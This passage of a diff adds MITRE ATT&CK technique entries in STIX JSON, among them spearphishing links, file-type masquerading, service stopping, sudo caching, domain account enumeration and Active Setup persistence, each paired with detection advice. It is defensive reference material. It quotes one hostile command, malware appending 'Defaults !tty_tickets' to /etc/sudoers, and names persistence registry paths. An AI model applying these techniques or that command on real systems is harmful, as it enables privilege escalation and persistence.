"Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.", + "url": "https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/" + }, + { + "source_name": "Microsoft SAML Token Lifetimes", + "description": "Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes" + }, + { + "source_name": "Microsoft SolarWinds Customer Guidance", + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", + "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + }, + { + "source_name": "Cyberark Golden SAML", + "description": "Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.", + "url": "https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" + }, + { + "source_name": "Sygnia Golden SAML", + "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", + "url": "https://www.sygnia.co/golden-saml-advisory" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Spearphishing Link", + "description": "Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)", + "Mark Wee", + "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", + "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)" + ], + "x_mitre_detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections for Spearphishing Link take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Office 365", + "SaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1192", + "external_id": "T1192" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html", + "external_id": "CAPEC-163" + }, + { + "source_name": "Trend Micro Pawn Storm OAuth 2017", + "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-06-14T23:03:51.540Z", + "name": "Masquerade File Type", + "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "CrowdStrike Falcon OverWatch", + "Ben Smith, @ezaspy" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "created": "2023-03-08T22:40:06.918Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/008", + "external_id": "T1036.008" + }, + { + "source_name": "polygot_icedID", + "description": "Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.", + "url": "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "created": "2019-03-29T19:00:55.901Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1489", + "external_id": "T1489" + }, + { + "source_name": "SecureWorks WannaCry Analysis", + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.", + "url": "https://www.secureworks.com/research/wcry-ransomware-analysis" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Malware", + "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "created": "2020-10-01T01:33:01.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1587/001", + "external_id": "T1587.001" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ActiveMalwareEnergy", + "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/" + }, + { + "source_name": "FBI Flash FIN7 USB", + "description": "The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.", + "url": "https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/" + }, + { + "source_name": "FireEye APT29", + "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Regsvcs/Regasm", + "description": "Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nAdversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Casey Smith" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302", + "created": "2017-05-31T21:31:33.499Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1121", + "external_id": "T1121" + }, + { + "source_name": "MSDN Regsvcs", + "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx" + }, + { + "source_name": "MSDN Regasm", + "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx" + }, + { + "source_name": "LOLBAS Regsvcs", + "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/" + }, + { + "source_name": "LOLBAS Regasm", + "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Device Driver Discovery", + "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "created": "2023-03-28T20:14:49.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1652", + "external_id": "T1652" + }, + { + "source_name": "lsmod man", + "description": "Kerrisk, M. (2022, December 18). lsmod(8) — Linux manual page. Retrieved March 28, 2023.", + "url": "https://man7.org/linux/man-pages/man8/lsmod.8.html" + }, + { + "source_name": "Microsoft Registry Drivers", + "description": "Microsoft. (2021, December 14). Registry Trees for Devices and Drivers. Retrieved March 28, 2023.", + "url": "https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys" + }, + { + "source_name": "Microsoft EnumDeviceDrivers", + "description": "Microsoft. (2021, October 12). EnumDeviceDrivers function (psapi.h). Retrieved March 28, 2023.", + "url": "https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers" + }, + { + "source_name": "Microsoft Driverquery", + "description": "Microsoft. (n.d.). driverquery. Retrieved March 28, 2023.", + "url": "https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery" + }, + { + "source_name": "Linux Kernel Programming", + "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", + "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf" + }, + { + "source_name": "modinfo man", + "description": "Russell, R. (n.d.). modinfo(8) - Linux man page. Retrieved March 28, 2023.", + "url": "https://linux.die.net/man/8/modinfo" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Sudo Caching", + "description": "The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\" (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout that is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nAdversaries can abuse poor configurations of this to escalate privileges without needing the user's password. /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. When tty_tickets is disabled, adversaries can do this from any tty for that user. \n\nThe OSX Proton Malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2169ba87-1146-4fc7-a118-12b72251db7e", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1206", + "external_id": "T1206" + }, + { + "source_name": "sudo man page 2018", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "url": "https://www.sudo.ws/" + }, + { + "source_name": "cybereason osx proton", + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T21:33:57.732Z", + "name": "Domain Account", + "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ExtraHop", + "Miriam Wiesner, @miriamxyra, Microsoft Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "created": "2020-02-21T21:08:26.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1087/002", + "external_id": "T1087.002" + }, + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Active Setup", + "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", + "created": "2020-12-18T16:33:13.098Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/014", + "external_id": "T1547.014" + }, + { + "source_name": "SECURELIST Bright Star 2015", + "description": "Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.", + "url": "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/" + }, + { + "source_name": "Mandiant Glyer APT 2010", + "description": "Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.", + "url": "https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf" + }, + { + "source_name": "FireEye CFR Watering Hole 2012", + "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html" + }, + { + "source_name": "Klein Active Setup 2010", + "description": "Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.", + "url": "https://helgeklein.com/blog/2010/04/active-setup-explained/" + }, + { + "source_name": "paloalto Tropic Trooper 2016", + "description": "Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.", + "url": "https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Citizenlab Packrat 2015", + "description": "Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.", + "url": "https://citizenlab.ca/2015/12/packrat-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-29T17:45:48.126Z", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments 